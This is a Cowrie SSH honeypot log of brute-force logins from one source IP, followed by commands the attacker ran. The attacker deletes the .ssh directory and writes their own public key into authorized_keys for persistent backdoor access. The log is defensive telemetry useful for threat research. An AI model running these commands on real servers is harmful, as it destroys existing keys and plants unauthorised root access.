{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:29.053434Z","src_ip":"212.227.235.229","session":"fa482203a08b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:30.233322Z","src_ip":"212.227.235.229","session":"fa482203a08b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43498,"dst_ip":"1.2.3.4","dst_port":22,"session":"df5829bc688f","protocol":"ssh","message":"New connection: 212.227.235.229:43498 (1.2.3.4:22) [session: df5829bc688f]","sensor":"my-vps","timestamp":"2025-09-08T21:52:30.409478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:30.410359Z","src_ip":"212.227.235.229","session":"df5829bc688f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:30.586046Z","src_ip":"212.227.235.229","session":"df5829bc688f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:52:31.331362Z","src_ip":"212.227.235.229","session":"df5829bc688f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:31.508451Z","src_ip":"212.227.235.229","session":"df5829bc688f"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:31.509445Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37208,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc2e62db7379","protocol":"ssh","message":"New connection: 212.227.235.229:37208 (1.2.3.4:22) [session: fc2e62db7379]","sensor":"my-vps","timestamp":"2025-09-08T21:52:33.206851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:34.795219Z","src_ip":"212.227.235.229","session":"fc2e62db7379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:34.795882Z","src_ip":"212.227.235.229","session":"fc2e62db7379"}
{"eventid":"cowrie.login.failed","username":"terrariaserver","password":"terrariaserver","message":"login attempt [terrariaserver/terrariaserver] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:35.801638Z","src_ip":"212.227.235.229","session":"fc2e62db7379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34886,"dst_ip":"1.2.3.4","dst_port":22,"session":"d286d16b6dc0","protocol":"ssh","message":"New connection: 212.227.235.229:34886 (1.2.3.4:22) [session: d286d16b6dc0]","sensor":"my-vps","timestamp":"2025-09-08T21:52:35.919776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:35.921081Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:36.232575Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:37.059018Z","src_ip":"212.227.235.229","session":"fc2e62db7379"}
{"eventid":"cowrie.login.success","username":"root","password":"134679","message":"login attempt [root/134679] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:52:37.519452Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:52:38.180987Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:52:38.181921Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:52:38.183219Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:38.497205Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:52:39.224339Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:52:39.225015Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:52:39.540066Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:39.541200Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34902,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b7ec7a941a7","protocol":"ssh","message":"New connection: 212.227.235.229:34902 (1.2.3.4:22) [session: 6b7ec7a941a7]","sensor":"my-vps","timestamp":"2025-09-08T21:52:39.720805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:39.721651Z","src_ip":"212.227.235.229","session":"6b7ec7a941a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:39.964734Z","src_ip":"212.227.235.229","session":"6b7ec7a941a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37008,"dst_ip":"1.2.3.4","dst_port":22,"session":"29fbb5bcb978","protocol":"ssh","message":"New connection: 212.227.235.229:37008 (1.2.3.4:22) [session: 29fbb5bcb978]","sensor":"my-vps","timestamp":"2025-09-08T21:52:40.305777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:40.306676Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:40.599879Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54250,"dst_ip":"1.2.3.4","dst_port":22,"session":"75543c316899","protocol":"ssh","message":"New connection: 212.227.235.229:54250 (1.2.3.4:22) [session: 75543c316899]","sensor":"my-vps","timestamp":"2025-09-08T21:52:40.684917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:40.686062Z","src_ip":"212.227.235.229","session":"75543c316899"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:40.981067Z","src_ip":"212.227.235.229","session":"6b7ec7a941a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:41.002532Z","src_ip":"212.227.235.229","session":"75543c316899"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56916,"dst_ip":"1.2.3.4","dst_port":22,"session":"e374ea5e29ef","protocol":"ssh","message":"New connection: 212.227.235.229:56916 (1.2.3.4:22) [session: e374ea5e29ef]","sensor":"my-vps","timestamp":"2025-09-08T21:52:41.699416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:41.700094Z","src_ip":"212.227.235.229","session":"e374ea5e29ef"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme123","message":"login attempt [root/changeme123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:52:41.815340Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.027150Z","src_ip":"212.227.235.229","session":"e374ea5e29ef"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.226016Z","src_ip":"212.227.235.229","session":"6b7ec7a941a7"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"123","message":"login attempt [db1inst1/123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.308555Z","src_ip":"212.227.235.229","session":"75543c316899"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:52:42.472012Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.472786Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.473695Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43260,"dst_ip":"1.2.3.4","dst_port":22,"session":"10bdf532d0d0","protocol":"ssh","message":"New connection: 212.227.235.229:43260 (1.2.3.4:22) [session: 10bdf532d0d0]","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.593611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.594354Z","src_ip":"212.227.235.229","session":"10bdf532d0d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.768002Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:42.899770Z","src_ip":"212.227.235.229","session":"10bdf532d0d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:52:43.371651Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.372339Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
